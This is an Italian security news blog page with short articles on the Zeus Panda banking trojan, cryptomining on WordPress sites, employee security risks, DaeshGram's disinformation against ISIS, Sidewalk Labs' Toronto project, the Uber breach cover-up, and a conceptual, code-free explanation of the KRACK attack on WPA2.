05 Novembre 2025
Home Blog Pagina 87

Zeus Panda. Il virus bancario che ce l’ha con gli italiani

0

Si chiama Zeus Panda ed è un virus bancario che sembra proprio avercela con gli italiani. Nel 2017 diverse compagnie di sicurezza hanno analizzato più di 40 siti di phishing costruiti contro gli utenti del nostro paese, e dedicati alla diffusione del virus Zeus Panda.

Si tratta di un Trojan bancario particolarmente versatile, concepito innanzitutto per rubare le credenziali bancarie e dati simili, ma che ha anche la capacità di eseguire una vasta serie di altre operazioni malevole grazie alla sua grande flessibilità. Anche se sono state osservate diverse varianti, nella stragrande maggioranza dei casi la tattica di attacco è sempre quella la stessa.

Zeus Panda contro le banche italiane

Le campagne di phishing che diffondono il virus Zeus Panda sono sempre relative a transazioni bancarie che richiedono attenzione immediata, come fatture da pagare o avvisi di problemi sul conto. In alcuni altri casi si osserva un ordine di spedizione a cui fare attenzione.

Il malware viene diffuso prevalentemente attraverso un documento allegato di Microsoft Office dall’estensione. doc o. xls. All’interno del documento ci sono delle macro, cioè delle piccole porzioni di codice che eseguono operazioni ripetitive, costruite per diffondere il virus Zeus Panda. Una volta che Zeus si è installato con successo sul computer, l’applicazione esegue dei controlli automatici per capire se si trova in un sistema operativo virtuale, che gira magari su una macchina che non è quella fisicamente in possesso della vittima.

Il virus Zeus Panda
Uno dei messaggi di phishing che veicola il virus Zeus Panda, mirato contro gli utenti italiani

Nel momento in cui il virus è sicuro di trovarsi di fronte ad un sistema operativo reale, Zeus Panda contatta il server dei pirati informatici e riceve ulteriori istruzioni per diffondere le infezioni. Queste istruzioni guidano il malware al furto organizzato di credenziali, specialmente quelle finanziarie e relative ad account bancari. In più, il virus è in grado di installare un keylogger per registrare tutto quello che viene digitato sulla tastiera, e per monitorare l’attività dell’utente.  Zeus Panda è in grado anche di utilizzare il computer compromesso per infettare altri utenti e in generale per essere a disposizione dei comandi da remoto dei pirati informatici.

L’evoluzione futura

Nel corso del 2017 il virus Zeus Panda ha utilizzato quasi sempre le stesse tecniche, migliorando le mail di phishing durante il tempo. In particolare le prime utilizzavano un file di Microsoft Office in formato .zip. Altre due campagne, una di febbraio e una risalente ad aprile, utilizzavano un javascript. Recentemente i pirati informatici hanno ulteriormente aggiornato il virus per stabilire comunicazioni più rapide con i loro server e hanno aperto un sito dal dominio. bit per inviare informazioni al virus. Questo rende ancora più difficile individuare l’origine delle istruzioni malevole e più complicata la rimozione.

Ci aspettiamo che Zeus Panda e le campagne che prendono di mira gli utenti italiani continueranno per tutto il 2018, ed è altamente probabile che saranno distribuite nuove varianti. Al momento attuale il virus ha ancora qualche sbavatura: i file, per esempio vengono registrati in percorsi abbastanza ovvi all’interno del sistema operativo. Ma c’è da aspettarsi che anche questi errori verranno corretti. Ma soprattutto il malware imparerà a rubare le informazioni adattandosi sempre meglio ai metodi di comunicazione delle banche italiane con i loro clienti.

La mail di Enel Energia con il virus Zeus Panda
Una falsa mail che invita a leggere la bolletta di Enel Energia, è uno degli attacchi più pericolosi per la diffusione del virus Zeus Panda

Il modo con cui gli utenti italiani si possono difendere è innanzitutto quello di non credere a nessun tipo di comunicazione bancaria inviata per email. E’ necessario leggere con attenzione il testo delle mail inviate, in quanto spesso alcuni piccoli errori di punteggiatura o di ortografia possono far capire l’origine del messaggio. Particolare attenzione deve essere data a una presunta fattura di €277 da pagare e ad una mail che promette di poter visualizzare la bolletta di Enel Energia tramite la posta elettronica.

 

Allarme WordPress. L’hacker sfrutta il tuo sito e guadagna soldi virtuali

Il tuo sito WordPress è lento, le pagine si caricano con fatica o ricevi strane email di alert? Potresti essere vittima di un attacco informatico che sfrutta il tuo sito WordPress e il tuo server per generare a tua insaputa soldi virtuali, che finiscono sui conti di criminali digitali.

Negli ultimi tempi la preoccupante diffusione di attacchi di questo genere sta rapidamente colpendo migliaia di proprietari di siti WordPress: il rischio è quello di compromettere il proprio sito e il proprio server e di dover spendere diverso tempo e denaro per ripristinare la situazione. Non ultimo, regalare parecchi soldi a chi ci ha creato tutti questi fastidi: fino a 100mila dollari al giorno.

Il mining di criptovaluta attraverso i siti WordPress
Attaccano i siti in WordPress come ponte per raggiungerne i server. E qui inizia il mining di criptovaluta

Allarme WordPress. Tutta una questione di soldi

Per capire l’origine del problema è necessario comprendere rapidamente il concetto di criptovaluta. Non esistono più solamente i soldi reali, ma è stata sviluppata ormai da anni una valuta completamente virtuale, i Bitcoin. Queste monete digitali devono essere all’inizio acquistate con soldi reali attraverso alcuni istituti appositi, alchè diventano del denaro proprio del web, scambiabile su internet per la compravendita di beni.

Le criptovalute hanno però una caratteristica importante. Mentre i soldi reali possono essere stampati solamente dalla Banca d’Italia, le criptovalute possono essere generate autonomamente da chiunque. È necessario attivare un computer e dargli il comando di eseguire una serie di calcoli al fine di decifrare alcune stringhe di codice.

Nel momento in cui queste stringhe sono state decodificate e i calcoli sono terminati, si ottiene una unità, una moneta, della criptovaluta. Si chiama “Mining“, parola che rappresenta proprio l’atto di scavare in una miniera per farne sbucare dei soldi virtuali. Va da sé che maggiore è la potenza del computer che esegue i calcoli, più velocemente si riesce a convertire le stringhe di codice e ad ottenere “monete” digitali utilizzabili. Una di queste monete è Monero, il cui mining, a differenza di altre, si appoggia alla CPU senza bisogno di schede grafiche.

La criptovaluta Monero
Monero, la valuta digitale, che può essere minata senza bisogno di scheda grafica. La migliore per i pirati informatici

Per questo motivo, i pirati informatici creano delle reti internazionali di computer e di server compromessi, che mettono a loro disposizione per eseguire quanti più calcoli possibili, guadagnando alle spalle delle vittime. E qui entrano in gioco i siti WordPress. Nell’ultimo periodo si è assistito ad un attacco su vasta scala basato su dei virus che prendono di mira i siti basati sul popolarissimo CMS WordPress.

Questi virus sono particolarmente abili nel nascondersi ai normali software di sicurezza, modificano il loro nome per non farsi identificare e non provocano nessun tipo di cambiamento visibile al sito, in modo che l’amministratore non si accorga di nulla.

Dal sito WordPress allo sfruttamento del server

In realtà, utilizzando il sito in WordPress come ponte, il virus si installa sul server presso cui il sito è registrato, che viene raggirato e messo ad eseguire calcoli di mining per conto del pirata informatico. Normalmente l’amministratore di WordPress nota una sensibile rallentamento nel caricamento delle pagine ma non riesce a capire l’origine del problema. Nel lungo periodo, i server compromessi si dedicano sostanzialmente a due cose: diffondere il virus ad altri WordPress per aggiungere nuovi server alla rete malevola e minare dati per conto del pirata informatico.

Server WordPress compromessi
I server compromessi servono a due cose: infettare altri WordPress e minare soldi virtuali. Fino a 100 mila euro al giorno

L’impatto sul sito e sul business della vittima è evidente: le attività legate al dominio si bloccano in maniera irrimediabile e al danno di veder danneggiato il proprio lavoro e la reputazione del proprio sito nei confronti di clienti, si aggiunge la beffa di aver aiutato Il pirata informatico a guadagnare. Si stima che alcune botnet siano in grado di generare centomila dollari al giorno con questo sistema.

Il team di Alground ha analizzato fin dai primi giorni le dinamiche di questi attacchi e ha sviluppato un servizio gratuito che permette di verificare se è attivo un mining sul proprio server, attraverso il proprio sito WordPress. Utilizzando il modulo in fondo all’articolo è possibile richiedere un’analisi gratuita della propria situazione.

I metodi per risolvere questo tipo di attacco sono sostanzialmente due. Il primo è quello di bonificare lo stato di salute del proprio WordPress: può essere utile un’occhiata ai log con tutte le attività e una verifica dell’integrità dei file sul server. Questa operazione può essere eseguita direttamente dall’amministratore del sito, se ha conoscenze di programmazione WordPress sufficientemente avanzate. Oppure può essere svolto dal nostro team di Alground Security, che si appoggia a sofisticati strumenti in collaborazione con la Sucuri per rimuovere ogni tipo di infezione su WordPress.

La soluzione definitiva è invece quella di appoggiarsi ad un hosting hardenizzato per questo tipo di minacce. Alground Hosting attua un controllo in tempo reale delle richieste e dell’attività del server, accorgendosi immediatamente di ogni tipo di anomalia ed intervenendo proattivamente per impedire il propagarsi di software malevolo e per eliminare alla radice l’attività di mining della criptovaluta. Data la gravità della situazione, Alground Hosting offre, eccezionalmente, la migrazione gratuita del proprio sito WordPress sui nostri server sicuri.

Seleziona un modulo valido

Gli esperti di sicurezza informatica avvertono le aziende: i dipendenti sono un pericolo

0

T-Systems (www.t-systems.co.uk), l’ente IT e di sicurezza informatica di Deutsche Telekom (la più grande società europea di telecomunicazioni), mette in guardia le organizzazioni dai rischi per la sicurezza associati al permettere ai dipendenti di lavorare mentre sono in vacanza a Natale.

T-Systems afferma che è essenziale che i dipendenti che devono assolutamente lavorare in remoto da casa o dal luogo di vacanza, abbiano ricevuto un addestramento sulla sicurezza informatica o rischieranno di compromettere la sicurezza aziendale e la riservatezza dei dati.

Scott Cairns, responsabile per la sicurezza informatica presso T-Systems, ha spiegato:

“Il tempo lontano dalla nostra vita frenetica di lavoro dovrebbe essere apprezzato, non rovinato dal continuo rispondere alle e-mail e alle richieste di lavoro. Mettendo da parte l’impatto sulle nostre famiglie, questa pratica crea anche una vera minaccia per la sicurezza informatica per le organizzazioni.”

“La nostra ricerca mostra che un terzo degli impiegati utilizza il Wi-Fi gratuito in luoghi come aeroporti, hotel, caffetterie e nei bar , nonostante questi siano precari e aperti all’intercettazione da parte di criminali informatici. Unita poi con la pratica diffusa di inviare i documenti dalla e-mail privata, dove la sicurezza è ovviamente inferiore, si espone la propria azienda a potenziali attacchi.”

“Il nostro messaggio alle aziende per le festività natalizie è che i dipendenti possano godere di una pausa ininterrotta. Scoraggiateli dal portarsi il lavoro in vacanza e assicuratevi che non si sentano costretti a lavorare quando dovrebbero prendersi una pausa.”

La ricerca ha rilevato che, nonostante il ritmo con cui si stanno evolvendo gli attacchi informatici, il 66% degli intervistati non ha ricevuto alcuna formazione aggiornata negli ultimi dodici mesi. Quasi il 30% degli intervistati afferma di non aver mai avuto un’educazione alla sicurezza informatica.

“Laddove è inevitabile, le aziende dovrebbero assicurarsi che ci sia formazione e chiare linee guida da seguire. Molti dipendenti non sono informati sulla moltitudine di modi in cui i loro dispositivi possono essere infettati da virus e malware… e coloro che ritenevano di essere “molto competenti” spesso davano la risposta sbagliata quando venivano interrogati”.

“La formazione regolare dei dipendenti su pratiche di sicurezza informatica efficaci è probabilmente il passo più utile che le aziende possano intraprendere per ridurre drasticamente i rischi di virus, malware e altre forme comuni di criminalità informatica”.

La ricerca di T-Systems è stata condotta dall’agenzia di ricerche di mercato Censuswide su oltre 2.000 dipendenti del Regno Unito. I suoi risultati dimostrano che:

  • Quasi un terzo dei dipendenti (31%) utilizza gli hotspot Wi-Fi gratuiti e quasi un quarto (24%) li utilizza per inviare e-mail e documenti relativi al lavoro . Queste sono aree di grande pericolo in quanto sono insicure e facili da clonare per gli attacker
  • Il 28% dei dipendenti invia documenti di lavoro da e verso la propria e-mail personale, nonostante questo comporti numerosi problemi di sicurezza
  • Il 10% utilizza gratuitamente punti di ricarica USB negli aeroporti e nelle stazioni. Queste porte possono essere utilizzate per trasferire virus e malware a utenti ignari
  • Il 28% dei dipendenti non ha mai avuto nella propria carriera lavorativa alcuna formazione sulla sicurezza informatica per proteggere se stessi e l’ambiente di lavoro

La formazione sulla sicurezza informatica per tutti i dipendenti è particolarmente importante poiché i pericoli continuano anche quando i dipendenti tornano a casa dalle loro vacanze di Natale. La ricerca di T-Systems ha rilevato che:

  • Il 18% dei dipendenti ammette di collegare la propria fotocamera digitale al proprio computer di lavoro per scaricare foto. E pensa che le connessioni Wi-Fi e Bluetooth siano più sicure, ignorando invece che virus e malware si possano facilmente trasferire tramite connessioni wireless e diffondersi rapidamente all’interno dell’azienda.
  • Il 15% ammette di collegare chiavette USB e schede di memoria che condivide con i propri familiari sul proprio computer di lavoro. Un modo sicuro per i virus di diffondersi rapidamente da casa ad azienda.

Per destabilizzare i terroristi ISIS la soluzione c’è: il porno

Per destabilizzare l’ISIS, almeno online, la soluzione c’è: il porno.

Un paio di settimane fa un gruppo di hacker musulmani è entrato all’interno del sito ufficiale dello stato islamico chiamato Amaq, e ha rubato una lista di 2000 utenti iscritti. Ora un altro gruppo di sei hacker di origine musulmana, è riuscito a mettere sotto scacco l’organizzazione terroristica utilizzando delle false notizie e del contenuto pornografico.

Il gruppo si definisce DaeshGram: si tratta di una unione di “Daesh“, il nome con il quale il gruppo terroristico definisce se stesso in lingua araba, e del suffisso “Gram“, che deriva direttamente dal social network Instagram. Non sono chiare le identità di questo gruppo hacker ma fra essi si nasconde uno studente, un ingegnere e quattro ricercatori di cybersicurezza che vivono in Iraq e combattono l’Isis sul piano delle comunicazioni digitali.

Il gruppo inizia il suo lavoro registrando i post, le attività e il comportamento di tutti i membri dell’Isis sui siti e sulla applicazione criptata Telegram, che viene utilizzata dai terroristi per comunicare fra di loro nel mondo. Ad un certo punto, gli hacker hanno postato un immagine realizzata con il programma Photoshop di una donna nuda coinvolta in una scena porno, assieme alla notizia dell’apertura di un cinema a luci rosse per i membri dell’ISIS in Siria.

Fake news e porno: il cocktail micidiale per confondere le comunicazioni ISIS

Subito dopo, è stato allegato un video che mostrava dei partecipanti dell’Isis intenti a guardare il film porno: queste informazioni hanno di fatto confuso i membri dell’organizzazione terroristica e Daeshgram è riuscito nel suo intento di diminuire la credibilità delle informazioni che vengono scambiate sulla loro rete.

In un altro caso il gruppo ha caricato un video dove sembrava che il sito ufficiale di Amaq fosse stato hackerato. Il video era confezionato in maniera così credibile da aver creato il panico tra i membri dell’Isis. La reazione, come ci si aspettava, è stata di sconcerto e alcuni membri hanno iniziato a litigare fra di loro, alcuni hanno abbandonato le conversazioni segrete a cui partecipavano e altri membri sono stati esclusi dagli amministratori delle chat.

Infine gli stessi partecipanti alle chat del Daesh hanno raccomandato ai membri di non credere a tutti i link che sembravano provenire da Amaq, facendo il gioco di Daeshgram: confondere le informazioni  veicolate attraverso i classici strumenti di propaganda significa indebolire la rete di comunicazione dei terroristi.

E ancora: in uno degli attacchi più recenti del Daeshgram, gli hacker sono stati in grado di diffondere un falso audio contenente un messaggio dei capi dell’Isis dove si annunciava che la stazione radio al Bayan, loro alleata, era stata distrutta in un attacco aereo. Secondo le stime, l’audio è stato scaricato 800 volte creando tensione tra i partecipanti all’Isis.

La falsa notizia di un cinema porno dedicato ai membri ISIS ha minato la credibilità delle reti di comunicazione degli estremisti islamici

Uno dei membri di Daeshgram ha spiegato al quotidiano Daily Beast la tecnica. “Noi lasciamo credere al Dash di essere capaci di replicare le loro informazioni in maniera altamente credibile per instillare in loro il dubbio. Le nostre produzioni devono essere subdole e altamente attendibili. Vogliamo creare dei contenuti a cui i membri all’Ssis credano immediatamente, senza metterli minimamente in dubbio.” Daeshgram mira a migliorare sempre di più le sue sofisticate tecniche per confondere e innervosire ogni tipo di comunicazione dei reali terroristi.

In passato vi erano state delle altre iniziative per attaccare  online il gruppo Isis. Precedentemente l’hacker WauchulaGhost aveva defacciato il loro account Twitter con della pornografia e del contenuto Pro LGBT, mentre l’arcinoto gruppo di attivisti Anonymous aveva defacciato il loro sito ufficiale includendo delle pubblicità di Viagra. Ma l’approccio del gruppo Daeshgram non è un attacco estemporaneo, ma una vera tattica di antiterrorismo in grado di minare in maniera definitiva il sistema di comunicazione degli estremisti islamici.

E se Google creasse città intelligenti sotto il suo controllo?

0

Cosa potrebbe accadere se Google o una azienda a lei collegata potesse creare delle città informatizzate e avesse il pieno controllo su tutte le sue infrastrutture? È un’ipotesi più che reale che in Canada sta già sollevando forti dubbi sulla privacy.

Anni fa, i fondatori di Google si chiesero che cosa sarebbe successo se la loro tecnologia e l’esperienza aziendale fosse stata applicata non a singoli oggetti ma ad una intera città. “Abbiamo iniziato a parlarne qualche tempo fa e ci siamo chiesti che cosa saremmo stati capaci di fare se qualcuno ci avesse dato una zona in cui costruire e il permesso di creare dei nuclei abitativi da zero”, aveva spiegato il CEO di Alphabet Google, Eric Schmidt.

Lo scorso mese, dopo una competizione pubblica, il governo canadese ha creato una organizzazione che ha il compito di rivitalizzare un area vicina al lago Ontario, nell’ambito del progetto “Waterfront Toronto” e la Sidewalk Labs, legata a Google, è stata scelta come partner per l’innovazione. L’azienda ha subito risposto con dei progetti futuristici di una città hi-tech e collegata ad internet.

Così potrebbe apparire una città hi-tech costruita da una azienda collegata a Google i cui servizi sono di fatto in mano ad un solo partner

La compagnia ha prospettato, anche con una serie di tavole e disegni, delle strade intelligenti, degli autobus che si guidano da soli, e una serie di canali metropolitani dove dei robot buttano la spazzatura, trasportano i pacchetti che devono essere consegnati ai cittadini e svolgono in piena autonomia altri compiti importanti. La sidewalk Lab ha promesso di investire 50 milioni di dollari per concretizzare il progetto nel corso del prossimo anno.

Le città intelligenti di Google: una communità hi-tech sotto il suo controllo?

Al momento, andando a visitare il luogo dove dovrebbe sorgere questa cittadina, è difficile immaginare qualcosa di così futuristico. Per ora si tratta ancora di una terra disabitata, con pochi silos di grano appartenenti ad alcuni contadini della zona. Ma Dan Doctoroff, il CEO di Sidewalk Lab e assessore della città di New York, ha promesso di impegnarsi per creare in quella zona una città dove le strade prendono letteralmente vita assieme all’attività dei cittadini.

Doctoroff spiega la sua visione di una comunità cittadina dove dei taxi e degli autobus robot guidano le persone, evitando intelligentemente ciclisti e pedoni e dove la proprietà e lo sharing delle biciclette o dei mezzi pubblici viene largamente preferito al possesso di macchine private. Grazie al nuovo approccio di veicoli che si auto guidano e ad un gran numero di opzioni alternative all’automobile,  le strade saranno più libere e ci sarà molto più spazio per la creazione di spazi pubblici e giardini.

E la sua realizzazione non sarebbe troppo difficile. Google detiene già Waymo, una compagnia dedicata alla costruzione di macchine intelligenti che si guidano da sole, e Nest, un’altra azienda concentrata sulla tecnologia per la casa.

In una conferenza dello scorso mese, il primo ministro canadese Justin Trudeau, parlando del progetto,  ha presentato il progetto come una possibilità per ottenere dei nuovi posti di lavoro fino alla costruzione di un hub permanente per l’innovazione.

Preoccupazioni sulla privacy

Gli abitanti di Toronto hanno visioni contrastanti sull’idea. Alcuni attivisti protestano dicendo che la visione della compagnia non è abbastanza chiara per poterne comprendere le dinamiche e le ripercussioni sui cittadini. Alejandra Ruiz Vargas, portavoce del gruppo Acorn, si preoccupa che le innovazioni pensino piuttosto a fornire abitazioni per le persone sotto la soglia della povertà.

La Sidewalk Labs, ha in parte risposto a questo problematica, spiegando di avere intenzione di aggiungere al progetto alcune abitazioni modulari che si basano su tecnologie di costruzione particolarmente rapide e che possono adattarsi all’architettura del vicinanze.

La città digitale di Toronto Waterfront sarebbe gestita da macchine robot e da meccanismi di movimento sotterraneo automatici

Un altra fascia di cittadini, quelli più impiegati nel settore terziario, sono invece entusiasti: Asma Khan, un project manager di 35 anni che ha fondato una propria azienda tecnologica a Toronto, sembra accogliere al meglio la nuova idea.

Ma in generale i dubbi e le domande su una città completamente guidata dalla tecnologia e alla fine collegata a Google sono legittime. “Siamo preoccupati che Google possa utilizzare questo lab, e di fatto le nostre vite, per testare le nostre reazioni, spiega Donna Patterson, una attivista che dice di vivere vicino al sito dove dovrebbe essere costruita la città digitale.

E se da un lato la Sidewalk spiega che la raccolta dati ha il solo obiettivo di migliorare la qualità dei servizi, è evidente che l’abbondanza di informazioni così specifiche sulla vita di una comunità non può che essere guardata con golosità dagli sponsor. Tanto più che non esistono regole precise: sappiamo tutti che la privacy negli spazi pubblici è soggetta a regole non chiarissime.

Tutti  hanno una videocamera nel proprio smartphone, non sappiamo chi viene ripreso, in quale momento e a che titolo e anche sul trattamento dei dati non ci sono leggi precise.

E Doctoroff, nel corso di una intervista, alla domanda se i dati dei cittadini sarebbero stati usati per guadagnare ha risposto in maniera abbastanza sibillina. “Se puoi migliorare in maniera importante  la condizione esistenziale delle persone, un modo per guadagnare lo si trova sempre. Quali saranno queste vie? potrebbero essere associate allo sviluppo della città, oppure alla concessione di licenze per l’utilizzo delle tecnologie. Abbiamo molto tempo per pensarci.”

Uber. Rubati dati personali di 57 milioni di persone

0

Hanno rubato i dati personali di 57 milioni di clienti e conducenti di Uber Technologies Inc. , una grave violazione che la società ha nascosto per più di un anno. L’azienda ha licenziato il suo capo della sicurezza e uno dei suoi vice dai loro ruoli di controllori della sicurezza; sono coloro che hanno poi deciso di pagare addirittura $ 100.000 agli aggressori.

I dati compromessi dall’attacco dell’ottobre 2016 comprendevano nomi, indirizzi e-mail e numeri di telefono di 50 milioni di utenti Uber in tutto il mondo. È stato inoltre possibile accedere alle informazioni personali di circa 7 milioni di conducenti, inclusi circa 600.000 numeri di patenti degli Stati Uniti. Non sembra siano stati rubati numeri di previdenza sociale, informazioni sulla carta di credito, dettagli sui viaggi o altri dati, ha detto Uber.

Al momento del furto, Uber stava negoziando con i controllori statunitensi che indagavano su violazioni della privacy. Uber aveva l’obbligo legale di segnalare il furto di dati ai controllori e ai conducenti i cui numeri di licenza erano stati rubati. Invece, la società ha pagato gli attacker per eliminare i dati e mantenere il silenzio sulla violazione. Uber ha precisato che è convinta che le informazioni trafugate non siano mai state usate o vendute, ma ha comunque rifiutato di rivelare le identità degli attaccanti.

“Tutto ciò non avrebbe dovuto accadere e non cercherò scuse per questo”, ha detto Dara Khosrowshahi, che ha assunto la carica di amministratore delegato a settembre. “Stiamo però cambiando il modo in cui trattiamo i nostri affari”.

Dopo la rivelazione di Uber, il procuratore generale di New York, Eric Schneiderman, ha avviato un’indagine sul furto. La società è stata anche citata in giudizio per negligenza da parte di un cliente che vuole avviare una class action contro l’azienda.

Gli attacker si sono infiltrati con successo in numerose aziende negli ultimi anni. La violazione di Uber, è a livello dei furti subiti da Yahoo, MySpace, Target Corp., Anthem Inc. e Equifax Inc. Ciò che è più allarmante sono le misure estreme che Uber ha preso per nascondere l’attacco.

Come hanno rubato i dati a Uber

Due attacker hanno avuto accesso a un sito di codifica GitHub privato utilizzato dagli ingegneri del software Uber e hanno utilizzato le credenziali di accesso che hanno ottenuto per entrare su dei database di dati archiviati su un account Amazon Web Services che gestiva le attività di elaborazione per l’azienda. Da lì, i ladri hanno scoperto un archivio di informazioni su chi guidava le auto. Più tardi, hanno inviato una email a Uber per chiedere un riscatto, questo è quanto è stato detto dalla compagnia.

Un mosaico di leggi statali e federali impone alle aziende di avvisare le persone e le agenzie governative in caso di violazioni di dati sensibili.

“Al momento dell’incidente, abbiamo preso tutte le misure atte a proteggere i dati e chiudere ulteriori accessi non autorizzati da parte di estranei”, ha detto Khosrowshahi. “Abbiamo anche implementato misure di sicurezza per limitare l’accesso e rafforzare i controlli sui nostri account di archiviazione basati su cloud.”

Uber si è guadagnata una brutta reputazione nel rispettare i regolamenti nelle aree in cui ha operato dalla sua fondazione nel 2009. Gli Stati Uniti hanno aperto almeno cinque indagini su possibili tangenti, software illecito e furto di proprietà intellettuale. L’azienda con sede a San Francisco deve affrontare anche decine di cause civili.

Anche le autorità britanniche, compresa l’Agenzia nazionale per la criminalità, stanno esaminando la portata della violazione dei dati. Londra e altri governi hanno in precedenza preso provvedimenti per vietare il servizio Uber, per ora senza riuscirci.

Uber ora ha assunto come consulente Matt Olsen, ex consigliere generale presso la National Security Agency e direttore del National Counterterrorism Center. Aiuterà la società a ristrutturare i suoi team di sicurezza. Uber ha inoltre assunto Mandiant, una società di sicurezza informatica di proprietà di FireEye Inc. , per indagare sull’hack.

La società ha rilasciato una dichiarazione ai clienti dicendo di non aver visto “alcuna prova di frode o uso improprio legato all’incidente”. Uber ha detto che fornirà agli autisti le cui licenze sono state rubate la protezione del credito e la protezione dal furto di identità.

Key Reinstallation Attacks come funziona

Mathy Vanhoef ha scoperto gravi vulnerabilità in WPA2, un protocollo che protegge tutte le moderne reti Wi-Fi. Un utente malintenzionato presente nelle vicinanze di una vittima può sfruttare queste debolezze utilizzando k ey r einstallation un tta ck s (KRACKs). In concreto, gli attaccanti possono utilizzare questa nuova tecnica di intrusione per leggere le informazioni precedentemente registrate per essere crittografate in modo sicuro. Ciò può essere usato per rubare informazioni sensibili come i numeri di carta di credito, le password, i messaggi di chat, le email, le foto e così via. L’attacco funziona contro tutte le moderne reti Wi-Fi protette. A seconda della configurazione di rete, è anche possibile iniettare e manipolare i dati. Ad esempio, un aggressore potrebbe essere in grado di iniettare ransomware o altri malware nei siti web.

Le debolezze sono nello standard Wi-Fi stesso e non nei singoli prodotti o nelle implementazioni. Pertanto, è possibile che venga compromessa una corretta implementazione di WPA2. Per prevenire l’attacco, gli utenti devono aggiornare i prodotti interessati non appena gli aggiornamenti di protezione diventano disponibili. Tieni presente che se il tuo dispositivo supporta Wi-Fi, è probabilmente vulnerabile . Durante la ricerca iniziale, è stato scoperto che Android, Linux, Apple, Windows, OpenBSD, MediaTek, Linksys e altri sono tutti colpiti da una variante degli attacchi. Per ulteriori informazioni su prodotti specifici, consultare il database di CERT / CC o contattare il proprio fornitore.

La ricerca sarà presentata alla conferenza Computer and Communications Security (CCS) e alla conferenza di Black Hat Europe. Il nostro documento dettagliato sulla ricerca può essere già scaricato.

Come funziona l’attacco

Come proof of concept i ricercatori hanno eseguito un attacco Kracks su uno smartphone Android. In questa dimostrazione, l’attaccante è in grado di decrittografare tutti i dati che la vittima trasmette. Per un attaccante questo è facile da realizzare, perché il nostro attacco è estremamente devastante contro Linux e Android 6.0 o superiore. Questo perché Android e Linux possono essere ingannati nell’installazione di una chiave di crittografia. Quando attacca altri dispositivi, è più difficile decrittografare tutti i pacchetti, anche se un grande numero di pacchetti può comunque essere decifrato. In ogni caso, la seguente dimostrazione mette in evidenza il tipo di informazioni che un aggressore può ottenere quando esegue attacchi Kracks su reti Wi-Fi protette:

L’attacco non è limitato al recupero delle credenziali di accesso (ad esempio indirizzi e-mail e password). In generale, tutti i dati o le informazioni che la vittima trasmette possono essere de-crittografati. Inoltre, a seconda del dispositivo utilizzato e della configurazione della rete, è  possibile de-crittografare i dati inviati verso la vittima (ad es. Il contenuto di un sito web). Anche se i siti web o le applicazioni utilizzano HTTPS come un ulteriore livello di protezione, segnaliamo che questa protezione aggiuntiva può (ancora) essere ignorata in un numero preoccupante di situazioni. Ad esempio, HTTPS è stato precedentemente ignorato nel software non browser , in iOS e OS X di Apple , nelle applicazioni Android , nelle applicazioni Android ancora una volta nelle applicazioni bancarie, e anche nelle applicazioni VPN.

Dettagli sull’attacco Kracks

L’attacco principale è contro l’inizio della comunicazione (4-way handshake) del protocollo WPA2. Questo viene eseguito quando un client desidera entrare in una rete Wi-Fi protetta e viene utilizzato per confermare che sia il client sia il punto di accesso possiedono le credenziali corrette (ad esempio la password predefinita della rete). Allo stesso tempo, la comunicazione invia anche una nuova chiave di crittografia che verrà utilizzata per proteggere tutto il traffico successivo. Attualmente, tutte le moderne reti Wi-Fi  usano 4-way handshake. Ciò implica che tutte queste reti sono influenzate dallo stesso tipo di attacco (con qualche variante). Ad esempio, l’attacco funziona contro le reti Wi-Fi personali e aziendali, contro i precedenti WPA e gli ultimi standard WPA2, e anche contro le reti che utilizzano solo AES. Tutti i nostri attacchi contro WPA2 usano una nuova tecnica chiamata key reinstallation attacks (KRACK).

Key reinstallation attacks: descrizione di livello elevato

In un attacco key reinstallation attacks, l’avversario si oppone a una vittima nella reinstallazione di una chiave già in uso. Ciò è ottenuto manipolando e ripetendo messaggi di handshake crittografici . Quando la vittima reinstalla la chiave, i parametri associati, come il numero di pacchetti di trasmissione incrementale e il numero del pacchetto di ricezione vengono reimpostati al loro valore iniziale. Essenzialmente, per garantire la sicurezza, una chiave deve essere installata e utilizzata una sola volta. Purtroppo abbiamo visto che questo non è garantito dal protocollo WPA2. Manipolando l’handshake crittografico, possiamo forzare questa debolezza.

Key reinstallation attacks: esempio concreto contro la 4-way handshake

Come descritto nell’introduzione del documento di ricerca, lo sviluppo di un attacco di questo tipo può essere riassunto come segue:
quando un client entra in una rete, esegue un 4-way handshake (IEEE 802.11i) per negoziare una nuova chiave di crittografia. Installerà questa chiave dopo aver ricevuto il messaggio 4-way handshake. Una volta installata la chiave, questa verrà utilizzata per crittografare i frame di dati utilizzando un protocollo di crittografia. Tuttavia, poiché i messaggi possono essere persi o scartati, il punto di accesso (AP) ritrasmetterà il messaggio 3 se non ha ricevuto una risposta appropriata come conferma. Di conseguenza, il client può ricevere il messaggio 3 più volte. Ogni volta che riceve questo messaggio, reinstalla la stessa chiave di crittografia e quindi ripristina il numero di pacchetti di trasmissione incrementale. E’ dimostrato che un aggressore può forzare questi reset raccogliendo e ripetendo le ritrasmissioni del messaggio 3 del 4-way handshake. Forzando il riutilizzo della chiave inviata il protocollo di crittografia può essere attaccato, i pacchetti possono essere riprodotti, decrittografati e/o ricreati. La stessa tecnica può essere utilizzata anche per attaccare la chiave PeerKey, TDLS e la BSS transition handshake.

Impatto pratico sulle reti wifi

L’attacco più diffuso e più efficace è l’attacco Kracks contro il 4-way handshake. Questo giudizio è basato su due osservazioni. In primo luogo, durante la ricerca i tecnici hanno scoperto che la maggior parte dei client sono stati colpiti da questa vulnerabilità. In secondo luogo, si può utilizzare questo attacco per decodificare i pacchetti inviati dai client, consentendo quindi di intercettare informazioni sensibili quali password o cookie. La decrittazione dei pacchetti è possibile perché un attacco Kracks provoca l’azzeramento dei nodi di trasmissione (talvolta chiamati anche numeri dei pacchetti o vettori di inizializzazione). Di conseguenza, la stessa chiave di crittografia viene utilizzata con i valori già utilizzati in passato. Nel caso in cui un messaggio che riutilizzi il keystream abbia riconosciuto il contenuto, diventa banale derivare il keystream utilizzato. Questo keystream può quindi essere utilizzato per decriptare i messaggi con lo stesso nonce. Quando non esiste un contenuto noto, è più difficile decifrare i pacchetti, anche se teoricamente possibile in molti casi. In pratica, la ricerca dei pacchetti con contenuto noto non è un problema, quindi si deve supporre che qualsiasi pacchetto possa essere decriptato.

La capacità di decifrare i pacchetti può essere usata per leggere i pacchetti TCP SYN. Ciò consente ad un intruso di ottenere i numeri di sequenza TCP di una connessione e di convertire le connessioni TCP . Di conseguenza, anche se viene utilizzato WPA2, l’avversario può ora eseguire uno degli attacchi più comuni contro le reti Wi-Fi aperte: iniettando dati dannosi in connessioni HTTP non crittografate. Ad esempio, un aggressore può iniettare un ransomware o malware nei siti web che la vittima sta visitando.

